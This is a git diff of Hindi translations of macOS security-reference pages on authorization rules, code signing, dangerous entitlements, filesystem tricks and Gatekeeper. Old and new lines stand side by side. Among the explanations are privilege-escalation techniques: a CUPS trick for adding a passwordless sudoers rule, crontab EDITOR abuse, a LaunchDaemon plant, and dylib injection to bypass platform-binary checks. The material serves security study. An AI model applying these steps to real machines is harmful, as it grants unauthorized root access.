- "allow" अनुमति के लिए, "deny" अस्वीकृति के लिए, "user" यदि समूह संपत्ति ने एक समूह को इंगित किया है जिसकी सदस्यता पहुँच की अनुमति देती है, "rule" एक नियम को पूरा करने के लिए एक सरणी में इंगित करता है, "evaluate-mechanisms" के बाद एक `mechanisms` सरणी होती है जो या तो अंतर्निहित होती है या `/System/Library/CoreServices/SecurityAgentPlugins/` या /Library/Security//SecurityAgentPlugins के भीतर एक बंडल का नाम होता है।
- "allow" अनुमति के लिए, "deny" अस्वीकृति के लिए, "user" यदि समूह संपत्ति ने एक समूह को इंगित किया है जिसकी सदस्यता पहुँच की अनुमति देती है, "rule" एक नियम को पूरा करने के लिए एक सरणी में इंगित करता है, "evaluate-mechanisms" के बाद एक `mechanisms` सरणी होती है जो या तो अंतर्निहित होती है या `/System/Library/CoreServices/SecurityAgentPlugins/` या /Library/Security//SecurityAgentPlugins के अंदर एक बंडल का नाम होता है।
- **group**: समूह-आधारित अधिकृत के लिए नियम से संबंधित उपयोगकर्ता समूह को इंगित करता है।
- **kofn**: "k-of-n" पैरामीटर का प्रतिनिधित्व करता है, यह निर्धारित करता है कि कुल संख्या में से कितने उपनियमों को संतुष्ट किया जाना चाहिए।
- **timeout**: उस अवधि को परिभाषित करता है जो नियम द्वारा दी गई अधिकृत समाप्त होने से पहले सेकंड में होती है।
- **flags**: नियम के व्यवहार और विशेषताओं को संशोधित करने वाले विभिन्न ध्वजों को शामिल करता है
- **flags**: विभिन्न ध्वजों को शामिल करता है जो नियम के व्यवहार और विशेषताओं को संशोधित करते हैं
- **tries**: सुरक्षा बढ़ाने के लिए अनुमत अधिकृत प्रयासों की संख्या को सीमित करता है।
- **version**: संस्करण नियंत्रण और अपडेट के लिए नियम के संस्करण को ट्रैक करता है।
- **created**: ऑडिटिंग उद्देश्यों के लिए नियम के निर्माण का समय रिकॉर्ड करता है।
@ -77,7 +77,7 @@ security authorizationdb read com.apple.tcc.util.admin
इसके अलावा, सुरक्षा उपकरण का उपयोग करके कई `Security.framework` APIs का परीक्षण करना संभव है। उदाहरण के लिए, `AuthorizationExecuteWithPrivileges` चलाते समय: `security execute-with-privileges /bin/ls`
यह `/usr/libexec/security_authtrampoline /bin/ls` को रूट के रूप में फोर्क और एक्सेक करेगा, जो रूट के रूप में ls निष्पादित करने के लिए अनुमति मांगने के लिए एक प्रॉम्प्ट में पूछेगा:
यह `/usr/libexec/security_authtrampoline /bin/ls` को रूट के रूप में फोर्क और एक्सेक करेगा, जो रूट के रूप में ls निष्पादित करने के लिए अनुमतियों के लिए एक प्रॉम्प्ट में पूछेगा:
<figure><img src="../../../images/image (10).png" alt=""><figcaption></figcaption></figure>

12
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md
View File

@ -39,7 +39,7 @@ char data[];
__attribute__ ((aligned(1)));
```
सामान्य ब्लॉब में कोड निर्देशिका, आवश्यकताएँ और अधिकार और एक क्रिप्टोग्राफिक संदेश सिंटैक्स (CMS) शामिल होते हैं।\
इसके अलावा, ध्यान दें कि ब्लॉब में एन्कोड किया गया डेटा **बिग एंडियन** में एन्कोड किया गया है।
इसके अलावा, ध्यान दें कि ब्लॉब में एन्कोडेड डेटा **बिग एंडियन** में एन्कोडेड है।
इसके अलावा, हस्ताक्षर बाइनरी से अलग किए जा सकते हैं और `/var/db/DetachedSignatures` में संग्रहीत किए जा सकते हैं (जो iOS द्वारा उपयोग किया जाता है)।
@ -103,10 +103,10 @@ __attribute__ ((aligned(1)));
```
ध्यान दें कि इस संरचना के विभिन्न संस्करण हैं जहाँ पुराने संस्करणों में कम जानकारी हो सकती है।
## कोड साइनिंग पृष्ठ
## साइनिंग कोड पेजेस
पूर्ण बाइनरी का हैशिंग अप्रभावी और यहां तक कि बेकार होगा यदि इसे केवल आंशिक रूप से मेमोरी में लोड किया गया हो। इसलिए, कोड सिग्नेचर वास्तव में हैश का हैश है जहाँ प्रत्येक बाइनरी पृष्ठ को व्यक्तिगत रूप से हैश किया जाता है।\
वास्तव में, पिछले **कोड निर्देशिका** कोड में आप देख सकते हैं कि **पृष्ठ का आकार निर्दिष्ट है** इसके एक क्षेत्र में। इसके अलावा, यदि बाइनरी का आकार पृष्ठ के आकार का गुणांक नहीं है, तो क्षेत्र **CodeLimit** यह निर्दिष्ट करता है कि सिग्नेचर का अंत कहाँ है।
वास्तव में, पिछले **कोड डायरेक्टरी** कोड में आप देख सकते हैं कि **पृष्ठ का आकार निर्दिष्ट है** इसके एक क्षेत्र में। इसके अलावा, यदि बाइनरी का आकार पृष्ठ के आकार का गुणांक नहीं है, तो क्षेत्र **CodeLimit** यह निर्दिष्ट करता है कि सिग्नेचर का अंत कहाँ है।
```bash
# Get all hashes of /bin/ps
codesign -d -vvvvvv /bin/ps
@ -148,7 +148,7 @@ openssl sha256 /tmp/*.page.*
## Special Slots
MacOS अनुप्रयोगों को बाइनरी के अंदर निष्पादित करने के लिए उन्हें जो कुछ भी चाहिए वह नहीं होता है, बल्कि वे **external resources** (आमतौर पर अनुप्रयोगों के **bundle** के अंदर) का भी उपयोग करते हैं। इसलिए, बाइनरी के अंदर कुछ स्लॉट होते हैं जो कुछ दिलचस्प बाहरी संसाधनों के हैश को रखेंगे ताकि यह जांचा जा सके कि उन्हें संशोधित नहीं किया गया है।
MacOS अनुप्रयोगों को बाइनरी के अंदर निष्पादित करने के लिए उन्हें जो कुछ भी चाहिए वह नहीं होता, बल्कि वे **external resources** (आमतौर पर अनुप्रयोगों के **bundle** के अंदर) का भी उपयोग करते हैं। इसलिए, बाइनरी के अंदर कुछ स्लॉट होते हैं जो कुछ दिलचस्प बाहरी संसाधनों के हैश को रखेंगे ताकि यह जांचा जा सके कि उन्हें संशोधित नहीं किया गया है।
वास्तव में, कोड निर्देशिका संरचनाओं में एक पैरामीटर है जिसे **`nSpecialSlots`** कहा जाता है, जो विशेष स्लॉट की संख्या को इंगित करता है। वहाँ विशेष स्लॉट 0 नहीं है और सबसे सामान्य ( -1 से -6 तक) हैं:
@ -226,7 +226,7 @@ Executable=/Applications/Signal.app/Contents/MacOS/Signal
designated => identifier "org.whispersystems.signal-desktop" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = U68MSDN6DR
```
> [!NOTE]
> ध्यान दें कि ये सिग्नेचर चीजों की जांच कर सकते हैं जैसे प्रमाणन जानकारी, TeamID, IDs, अधिकार और कई अन्य डेटा।
> ध्यान दें कि ये सिग्नेचर प्रमाणन जानकारी, TeamID, IDs, अधिकार और कई अन्य डेटा जैसी चीजों की जांच कर सकते हैं
इसके अलावा, `csreq` टूल का उपयोग करके कुछ संकलित आवश्यकताएँ उत्पन्न करना संभव है:
```bash
@ -257,7 +257,7 @@ od -A x -t x1 /tmp/output.csreq
#### **कोड साइनिंग जानकारी तक पहुंचना**
- **`SecStaticCodeCreateWithPath`**: कोड सिग्नेचर का निरीक्षण करने के लिए फ़ाइल सिस्टम पथ से `SecStaticCodeRef` ऑब्जेक्ट को प्रारंभ करता है।
- **`SecStaticCodeCreateWithPath`**: कोड सिग्नेचर का निरीक्षण करने के लिए फ़ाइल सिस्टम पथ से `SecStaticCodeRef` ऑब्जेक्ट प्रारंभ करता है।
- **`SecCodeCopySigningInformation`**: `SecCodeRef` या `SecStaticCodeRef` से साइनिंग जानकारी प्राप्त करता है।
#### **कोड आवश्यकताओं को संशोधित करना**

20
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
View File

@ -21,7 +21,7 @@
### `com.apple.security.get-task-allow`
यह अधिकार अन्य प्रक्रियाओं को **`com.apple.security.cs.debugger`** अधिकार के साथ उस प्रक्रिया के टास्क पोर्ट को प्राप्त करने की अनुमति देता है जो इस अधिकार के साथ बाइनरी द्वारा चलायी जाती है और **इस पर कोड इंजेक्ट** करने की अनुमति देता है। अधिक जानकारी के लिए [**यहाँ देखें**](../macos-proces-abuse/macos-ipc-inter-process-communication/).
यह अधिकार अन्य प्रक्रियाओं को **`com.apple.security.cs.debugger`** अधिकार के साथ उस प्रक्रिया के टास्क पोर्ट को प्राप्त करने की अनुमति देता है जो इस अधिकार वाले बाइनरी द्वारा चलायी जाती है और **इस पर कोड इंजेक्ट** करने की अनुमति देता है। अधिक जानकारी के लिए [**यहाँ देखें**](../macos-proces-abuse/macos-ipc-inter-process-communication/).
### `com.apple.security.cs.debugger`
@ -29,16 +29,16 @@
### `com.apple.security.cs.disable-library-validation`
यह अधिकार **फ्रेमवर्क, प्लग-इन्स, या लाइब्रेरीज़ को लोड करने** की अनुमति देता है बिना Apple द्वारा साइन किए गए या मुख्य निष्पादन योग्य के समान टीम आईडी के साथ साइन किए गए, इसलिए एक हमलावर कुछ मनमान लाइब्रेरी लोड का दुरुपयोग करके कोड इंजेक्ट कर सकता है। अधिक जानकारी के लिए [**यहाँ देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_disable-library-validation).
यह अधिकार **Apple द्वारा साइन किए गए या मुख्य निष्पादन योग्य के समान टीम आईडी के साथ साइन किए गए** बिना फ्रेमवर्क, प्लग-इन या लाइब्रेरी को **लोड** करने की अनुमति देता है, इसलिए एक हमलावर कुछ मनमान लाइब्रेरी लोड का दुरुपयोग करके कोड इंजेक्ट कर सकता है। अधिक जानकारी के लिए [**यहाँ देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_disable-library-validation).
### `com.apple.private.security.clear-library-validation`
यह अधिकार **`com.apple.security.cs.disable-library-validation`** के बहुत समान है लेकिन **सीधे लाइब्रेरी वैलिडेशन को अक्षम करने** के बजाय, यह प्रक्रिया को **`csops` सिस्टम कॉल करने की अनुमति देता है ताकि इसे अक्षम किया जा सके**।\
यह अधिकार **`com.apple.security.cs.disable-library-validation`** के समान है लेकिन **सीधे लाइब्रेरी मान्यता को अक्षम करने** के बजाय, यह प्रक्रिया को **इसे अक्षम करने के लिए `csops` सिस्टम कॉल करने** की अनुमति देता है।\
अधिक जानकारी के लिए [**यहाँ देखें**](https://theevilbit.github.io/posts/com.apple.private.security.clear-library-validation/).
### `com.apple.security.cs.allow-dyld-environment-variables`
यह अधिकार **DYLD पर्यावरण चर का उपयोग करने** की अनुमति देता है जो लाइब्रेरी और कोड इंजेक्ट करने के लिए उपयोग किया जा सकता है। अधिक जानकारी के लिए [**यहाँ देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_allow-dyld-environment-variables).
यह अधिकार **DYLD पर्यावरण चर** का उपयोग करने की अनुमति देता है जो लाइब्रेरी और कोड इंजेक्ट करने के लिए उपयोग किए जा सकते हैं। अधिक जानकारी के लिए [**यहाँ देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_allow-dyld-environment-variables).
### `com.apple.private.tcc.manager` या `com.apple.rootless.storage`.`TCC`
@ -46,7 +46,7 @@
### **`system.install.apple-software`** और **`system.install.apple-software.standar-user`**
ये अधिकार **उपयोगकर्ता से अनुमति पूछे बिना सॉफ़्टवेयर स्थापित करने** की अनुमति देते हैं, जो **अधिकार वृद्धि** के लिए सहायक हो सकता है।
ये अधिकार **उपयोगकर्ता से अनुमति पूछे बिना सॉफ़्टवेयर स्थापित** करने की अनुमति देते हैं, जो **अधिकार वृद्धि** के लिए सहायक हो सकता है।
### `com.apple.private.security.kext-management`
@ -54,11 +54,11 @@
### **`com.apple.private.icloud-account-access`**
अधिकार **`com.apple.private.icloud-account-access`** के साथ **`com.apple.iCloudHelper`** XPC सेवा के साथ संवाद करना संभव है जो **iCloud टोकन** प्रदान करेगा।
अधिकार **`com.apple.private.icloud-account-access`** के माध्यम से **`com.apple.iCloudHelper`** XPC सेवा के साथ संवाद करना संभव है जो **iCloud टोकन** प्रदान करेगा।
**iMovie** और **Garageband** के पास यह अधिकार था।
इस अधिकार से **icloud टोकन प्राप्त करने** के लिए **शोषण** के बारे में अधिक जानकारी के लिए बात देखें: [**#OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula**](https://www.youtube.com/watch?v=_6e2LhmxVc0)
इस अधिकार से **icloud टोकन** प्राप्त करने के लिए **जानकारी** के लिए बात देखें: [**#OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula**](https://www.youtube.com/watch?v=_6e2LhmxVc0)
### `com.apple.private.tcc.manager.check-by-audit-token`
@ -74,7 +74,7 @@ TODO: [**इस रिपोर्ट में**](https://jhftss.github.io/The-
### `keychain-access-groups`
यह अधिकार **keychain** समूहों की सूची है जिनका ऐप्लिकेशन को एक्सेस है:
यह अधिकार **keychain** समूहों की सूची है जिन तक एप्लिकेशन की पहुँच है:
```xml
<key>keychain-access-groups</key>
<array>
@ -127,7 +127,7 @@ osascript -e 'tell app "App Store" to activate' -e 'tell app "App Store" to acti
### `com.apple.security.cs.allow-unsigned-executable-memory`
यह अधिकार **C कोड को ओवरराइड या पैच** करने की अनुमति देता है, लंबे समय से अप्रचलित **`NSCreateObjectFileImageFromMemory`** (जो मौलिक रूप से असुरक्षित है) का उपयोग करने की अनुमति देता है, या **DVDPlayback** फ्रेमवर्क का उपयोग करने की अनुमति देता है। अधिक जानकारी के लिए [**यह देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_allow-unsigned-executable-memory)।
यह अधिकार **C कोड को ओवरराइड या पैच** करने की अनुमति देता है, लंबे समय से अप्रचलित **`NSCreateObjectFileImageFromMemory`** (जो मौलिक रूप से असुरक्षित है) का उपयोग करने की अनुमति देता है, या **DVDPlayback** फ्रेमवर्क का उपयोग करता है। अधिक जानकारी के लिए [**यह देखें**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_allow-unsigned-executable-memory)।
> [!CAUTION]
> इस अधिकार को शामिल करने से आपका ऐप मेमोरी-खतरनाक कोड भाषाओं में सामान्य कमजोरियों के लिए उजागर होता है। सावधानी से विचार करें कि क्या आपके ऐप को इस अपवाद की आवश्यकता है।
@ -156,7 +156,7 @@ TODO
[Array]
[String] kTCCServiceAll
```
प्रक्रिया को **सभी TCC अनुमतियों के लिए पूछने** की अनुमति दें।
प्रक्रिया को **सभी TCC अनुमतियों के लिए पूछने की अनुमति दें**
### **`kTCCServicePostEvent`**

24
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
View File

@ -9,12 +9,12 @@
- **पढ़ें** - आप **डायरेक्टरी** प्रविष्टियों को **गिन सकते** हैं
- **लिखें** - आप डायरेक्टरी में **फाइलें** **हटा/लिख** सकते हैं और आप **खाली फ़ोल्डर** हटा सकते हैं।
- लेकिन आप **खाली नहीं** फ़ोल्डरों को **हटा/संशोधित** नहीं कर सकते जब तक कि आपके पास उस पर लिखने की अनुमति न हो।
- आप **फोल्डर का नाम** संशोधित नहीं कर सकते जब तक कि आप इसके मालिक न हों।
- **निष्पादित करें** - आपको **डायरेक्टरी** को पार करने की **अनुमति** है - यदि आपके पास यह अधिकार नहीं है, तो आप इसके अंदर किसी भी फाइलों या किसी भी उप-डायरेक्टरी में पहुँच नहीं सकते।
- आप **फोल्डर का नाम** संशोधित नहीं कर सकते जब तक कि आप इसके मालिक न हों।
- **निष्पादित करें** - आपको **डायरेक्टरी** को पार करने की **अनुमति** है - यदि आपके पास यह अधिकार नहीं है, तो आप इसके अंदर किसी भी फाइलों या किसी उप-डायरेक्टरी में पहुँच नहीं सकते।
### Dangerous Combinations
**कैसे एक फ़ाइल/फोल्डर को ओवरराइट करें जो रूट द्वारा स्वामित्व में है**, लेकिन:
**कैसे एक फ़ाइल/फोल्डर को ओवरराइट करें जो रूट द्वारा स्वामित्व में है**, लेकिन:
- पथ में एक माता-पिता **डायरेक्टरी का मालिक** उपयोगकर्ता है
- पथ में एक माता-पिता **डायरेक्टरी का मालिक** एक **उपयोगकर्ता समूह** है जिसमें **लिखने की पहुँच** है
@ -62,7 +62,7 @@ Example:
यदि `open` के लिए कॉल में `O_CLOEXEC` ध्वज नहीं है, तो फ़ाइल वर्णनकर्ता बच्चे की प्रक्रिया द्वारा विरासत में लिया जाएगा। इसलिए, यदि एक विशेषाधिकार प्राप्त प्रक्रिया एक विशेषाधिकार प्राप्त फ़ाइल खोलती है और हमलावर द्वारा नियंत्रित प्रक्रिया को निष्पादित करती है, तो हमलावर **विशेषाधिकार प्राप्त फ़ाइल पर FD विरासत में लेगा**
यदि आप **एक प्रक्रिया को उच्च विशेषाधिकार के साथ एक फ़ाइल या फ़ोल्डर खोलने** के लिए मजबूर कर सकते हैं, तो आप **`crontab`** का दुरुपयोग कर सकते हैं ताकि `/etc/sudoers.d` में **`EDITOR=exploit.py`** के साथ एक फ़ाइल खोली जा सके, ताकि `exploit.py` को `/etc/sudoers` के अंदर फ़ाइल का FD मिल सके और इसका दुरुपयोग कर सके।
यदि आप एक **प्रक्रिया को उच्च विशेषाधिकार के साथ फ़ाइल या फ़ोल्डर खोलने के लिए मजबूर कर सकते हैं**, तो आप **`crontab`** का दुरुपयोग कर सकते हैं ताकि `/etc/sudoers.d` में **`EDITOR=exploit.py`** के साथ एक फ़ाइल खोली जा सके, ताकि `exploit.py` को `/etc/sudoers` के अंदर फ़ाइल का FD मिल सके और इसका दुरुपयोग कर सके।
उदाहरण के लिए: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098), कोड: https://github.com/gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging
@ -97,7 +97,7 @@ xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol'
```
### writeextattr ACL
यह ACL फ़ाइल में `xattrs` जोड़ने से रोकता है
यह ACL फ़ाइल में `xattrs` जोड़ने से रोकता है
```bash
rm -rf /tmp/test*
echo test >/tmp/test
@ -126,7 +126,7 @@ ls -le /tmp/test
अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) की जांच करें।
इसकी नकल करने के लिए, हमें पहले सही acl स्ट्रिंग प्राप्त करने की आवश्यकता है:
इसे दोहराने के लिए, हमें पहले सही acl स्ट्रिंग प्राप्त करने की आवश्यकता है:
```bash
# Everything will be happening here
mkdir /tmp/temp_xattrs
@ -156,7 +156,7 @@ macos-xattr-acls-extra-stuff.md
### प्लेटफ़ॉर्म बाइनरी जांचों को बायपास करें
कुछ सुरक्षा जांचें यह जांचती हैं कि बाइनरी एक **प्लेटफ़ॉर्म बाइनरी** है, उदाहरण के लिए, XPC सेवा से कनेक्ट करने की अनुमति देने के लिए। हालाँकि, जैसा कि https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/ में एक बायपास में उजागर किया गया है, इस जांच को बायपास करना संभव है एक प्लेटफ़ॉर्म बाइनरी (जैसे /bin/ls) प्राप्त करके और `DYLD_INSERT_LIBRARIES` एनव वेरिएबल का उपयोग करके dyld के माध्यम से एक्सप्लॉइट को इंजेक्ट करके।
कुछ सुरक्षा जांचें यह जांचती हैं कि बाइनरी एक **प्लेटफ़ॉर्म बाइनरी** है, उदाहरण के लिए, XPC सेवा से कनेक्ट करने की अनुमति देने के लिए। हालाँकि, जैसा कि https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/ में एक बायपास में उजागर किया गया है, इस जांच को बायपास करना संभव है एक प्लेटफ़ॉर्म बाइनरी (जैसे /bin/ls) प्राप्त करके और `DYLD_INSERT_LIBRARIES` एनव वेरिएबल का उपयोग करके dyld के माध्यम से एक्सप्लॉइट को इंजेक्ट करके।
### फ्लैग्स `CS_REQUIRE_LV` और `CS_FORCED_LV` को बायपास करें
@ -173,11 +173,11 @@ csops(pid, 9, &status, 4); // CS_OPS_SET_STATUS
status = SecTaskGetCodeSignStatus(SecTaskCreateFromSelf(0));
NSLog(@"=====Inject successfully into %d(%@), csflags=0x%x", pid, exePath, status);
```
## कोड सिग्नेचर बायपास करें
## Bypass Code Signatures
बंडल में फ़ाइल **`_CodeSignature/CodeResources`** होती है जिसमें **बंडल** में हर एक **फ़ाइल** का **हैश** होता है। ध्यान दें कि CodeResources का हैश भी **एक्ज़ीक्यूटेबल** में **एंबेडेड** होता है, इसलिए हम इसके साथ भी छेड़छाड़ नहीं कर सकते।
Bundles में फ़ाइल **`_CodeSignature/CodeResources`** होती है जिसमें **bundle** में हर एक **file** का **hash** होता है। ध्यान दें कि CodeResources का hash भी **executable** में **embedded** होता है, इसलिए हम इसके साथ भी छेड़छाड़ नहीं कर सकते।
हालांकि, कुछ फ़ाइलें हैं जिनके सिग्नेचर की जांच नहीं की जाएगी, इनमें plist में omit कुंजी होती है, जैसे:
हालांकि, कुछ फ़ाइलें हैं जिनके हस्ताक्षर की जांच नहीं की जाएगी, इनमें plist में omit कुंजी होती है, जैसे:
```xml
<dict>
...
@ -261,7 +261,7 @@ hdiutil create -srcfolder justsome.app justsome.dmg
### डेमन
एक मनमाना **LaunchDaemon** लिखें जैसे **`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`** जिसमें एक plist हो जो एक मनमानी स्क्रिप्ट को निष्पादित करे जैसे:
एक मनमाना **LaunchDaemon** लिखें जैसे **`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`** जिसमें एक plist हो जो एक मनमानी स्क्रिप्ट निष्पादित करे जैसे:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -304,7 +304,7 @@ LogFilePerm 777
फिर, `/etc/sudoers.d/lpe` में आवश्यक कॉन्फ़िगरेशन लिखें ताकि विशेषाधिकार बढ़ाने के लिए `%staff ALL=(ALL) NOPASSWD:ALL` हो।
फिर, फ़ाइल `/etc/cups/cups-files.conf` को फिर से संशोधित करें और `LogFilePerm 700` इंगित करें ताकि नया sudoers फ़ाइल मान्य हो सके `cupsctl` को कॉल करते समय।
फिर, फ़ाइल `/etc/cups/cups-files.conf` को फिर से संशोधित करें और `LogFilePerm 700` इंगित करें ताकि नया sudoers फ़ाइल मान्य हो जाए `cupsctl` को कॉल करते समय।
### सैंडबॉक्स Escape

50
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
View File

@ -8,11 +8,11 @@
Gatekeeper का मुख्य तंत्र इसके **सत्यापन** प्रक्रिया में निहित है। यह जांचता है कि क्या डाउनलोड किया गया सॉफ़्टवेयर **एक मान्यता प्राप्त डेवलपर द्वारा हस्ताक्षरित** है, जो सॉफ़्टवेयर की प्रामाणिकता सुनिश्चित करता है। इसके अलावा, यह यह सुनिश्चित करता है कि सॉफ़्टवेयर **Apple द्वारा नोटराइज किया गया है**, यह पुष्टि करते हुए कि यह ज्ञात दुर्भावनापूर्ण सामग्री से मुक्त है और नोटराइजेशन के बाद इसमें छेड़छाड़ नहीं की गई है।
इसके अतिरिक्त, Gatekeeper उपयोगकर्ता नियंत्रण और सुरक्षा को **पहली बार डाउनलोड किए गए सॉफ़्टवेयर को खोलने के लिए उपयोगकर्ताओं से अनुमोदन प्राप्त करके** मजबूत करता है। यह सुरक्षा उपाय उपयोगकर्ताओं को संभावित हानिकारक निष्पादन योग्य कोड को अनजाने में चलाने से रोकने में मदद करता है, जिसे वे एक हानिरहित डेटा फ़ाइल समझ सकते हैं।
इसके अतिरिक्त, Gatekeeper उपयोगकर्ता नियंत्रण और सुरक्षा को **पहली बार डाउनलोड किए गए सॉफ़्टवेयर को खोलने के लिए उपयोगकर्ताओं से अनुमोदन प्राप्त करके** मजबूत करता है। यह सुरक्षा उपाय उपयोगकर्ताओं को संभावित हानिकारक निष्पादन योग्य कोड को अनजाने में चलाने से रोकने में मदद करता है जिसे वे एक हानिरहित डेटा फ़ाइल समझ सकते हैं।
### Application Signatures
Application signatures, जिन्हें कोड हस्ताक्षर भी कहा जाता है, Apple की सुरक्षा अवसंरचना का एक महत्वपूर्ण घटक हैं। इन्हें **सॉफ़्टवेयर लेखक** (डेवलपर) की पहचान को **सत्यापित करने** और यह सुनिश्चित करने के लिए उपयोग किया जाता है कि कोड को अंतिम बार हस्ताक्षरित किए जाने के बाद से इसमें छेड़छाड़ नहीं की गई है।
Application signatures, जिन्हें कोड हस्ताक्षर भी कहा जाता है, Apple की सुरक्षा अवसंरचना का एक महत्वपूर्ण घटक हैं। इन्हें **सॉफ़्टवेयर लेखक की पहचान की पुष्टि करने** और यह सुनिश्चित करने के लिए उपयोग किया जाता है कि कोड को अंतिम बार हस्ताक्षरित किए जाने के बाद से इसमें छेड़छाड़ नहीं की गई है।
यहाँ यह कैसे काम करता है:
@ -20,13 +20,13 @@ Application signatures, जिन्हें कोड हस्ताक्ष
2. **एप्लिकेशन का वितरण:** हस्ताक्षरित एप्लिकेशन फिर उपयोगकर्ताओं को डेवलपर के प्रमाणपत्र के साथ वितरित किया जाता है, जिसमें संबंधित सार्वजनिक कुंजी होती है।
3. **एप्लिकेशन का सत्यापन:** जब एक उपयोगकर्ता एप्लिकेशन डाउनलोड करता है और इसे चलाने का प्रयास करता है, तो उनका Mac ऑपरेटिंग सिस्टम डेवलपर के प्रमाणपत्र से सार्वजनिक कुंजी का उपयोग करके हैश को डिक्रिप्ट करता है। फिर यह एप्लिकेशन की वर्तमान स्थिति के आधार पर हैश की पुनः गणना करता है और इसे डिक्रिप्टेड हैश के साथ तुलना करता है। यदि वे मेल खाते हैं, तो इसका मतलब है कि **एप्लिकेशन में संशोधन नहीं किया गया है** जब से डेवलपर ने इसे हस्ताक्षरित किया था, और सिस्टम एप्लिकेशन को चलाने की अनुमति देता है।
Application signatures Apple की Gatekeeper तकनीक का एक आवश्यक हिस्सा हैं। जब एक उपयोगकर्ता **इंटरनेट से डाउनलोड किए गए एप्लिकेशन को खोलने का प्रयास करता है**, तो Gatekeeper एप्लिकेशन हस्ताक्षर को सत्यापित करता है। यदि यह Apple द्वारा एक ज्ञात डेवलपर को जारी किए गए प्रमाणपत्र के साथ हस्ताक्षरित है और कोड में छेड़छाड़ नहीं की गई है, तो Gatekeeper एप्लिकेशन को चलाने की अनुमति देता है। अन्यथा, यह एप्लिकेशन को ब्लॉक कर देता है और उपयोगकर्ता को सूचित करता है।
Application signatures Apple की Gatekeeper तकनीक का एक आवश्यक हिस्सा हैं। जब एक उपयोगकर्ता **इंटरनेट से डाउनलोड किए गए एप्लिकेशन को खोलने का प्रयास करता है**, तो Gatekeeper एप्लिकेशन हस्ताक्षर की पुष्टि करता है। यदि इसे एक ज्ञात डेवलपर को Apple द्वारा जारी किए गए प्रमाणपत्र के साथ हस्ताक्षरित किया गया है और कोड में छेड़छाड़ नहीं की गई है, तो Gatekeeper एप्लिकेशन को चलाने की अनुमति देता है। अन्यथा, यह एप्लिकेशन को ब्लॉक कर देता है और उपयोगकर्ता को सूचित करता है।
macOS Catalina से शुरू होकर, **Gatekeeper यह भी जांचता है कि क्या एप्लिकेशन को Apple द्वारा नोटराइज किया गया है**, जो सुरक्षा की एक अतिरिक्त परत जोड़ता है। नोटराइजेशन प्रक्रिया एप्लिकेशन की ज्ञात सुरक्षा समस्याओं और दुर्भावनापूर्ण कोड की जांच करती है, और यदि ये जांच पास होती हैं, तो Apple एप्लिकेशन में एक टिकट जोड़ता है जिसे Gatekeeper सत्यापित कर सकता है।
#### Check Signatures
जब कुछ **malware sample** की जांच करते हैं, तो आपको हमेशा **signature** की जांच करनी चाहिए क्योंकि **developer** जिसने इसे हस्ताक्षरित किया है, वह पहले से ही **malware** से **संबंधित** हो सकता है।
जब आप कुछ **malware sample** की जांच कर रहे हों, तो आपको हमेशा **signature** की जांच करनी चाहिए क्योंकि **developer** जिसने इसे हस्ताक्षरित किया है, वह पहले से ही **malware** से **संबंधित** हो सकता है।
```bash
# Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -45,18 +45,18 @@ codesign -s <cert-name-keychain> toolsdemo
```
### Notarization
Apple की नोटरीकरण प्रक्रिया उपयोगकर्ताओं को संभावित हानिकारक सॉफ़्टवेयर से बचाने के लिए एक अतिरिक्त सुरक्षा उपाय के रूप में कार्य करती है। इसमें **डेवलपर द्वारा उनके आवेदन को Apple's Notary Service** द्वारा परीक्षा के लिए प्रस्तुत करना शामिल है, जिसे App Review के साथ भ्रमित नहीं किया जाना चाहिए। यह सेवा एक **स्वचालित प्रणाली** है जो प्रस्तुत सॉफ़्टवेयर की जांच करती है कि उसमें **हानिकारक सामग्री** और कोड-हस्ताक्षर के साथ कोई संभावित समस्याएँ हैं या नहीं।
Apple की नोटरीकरण प्रक्रिया उपयोगकर्ताओं को संभावित हानिकारक सॉफ़्टवेयर से बचाने के लिए एक अतिरिक्त सुरक्षा उपाय के रूप में कार्य करती है। इसमें **डेवलपर द्वारा उनके आवेदन को** **Apple की नोटरी सेवा** द्वारा परीक्षा के लिए प्रस्तुत करना शामिल है, जिसे ऐप समीक्षा के साथ भ्रमित नहीं किया जाना चाहिए। यह सेवा एक **स्वचालित प्रणाली** है जो प्रस्तुत सॉफ़्टवेयर की जांच करती है कि उसमें **दुष्ट सामग्री** और कोड-हस्ताक्षर के साथ कोई संभावित समस्याएँ हैं या नहीं।
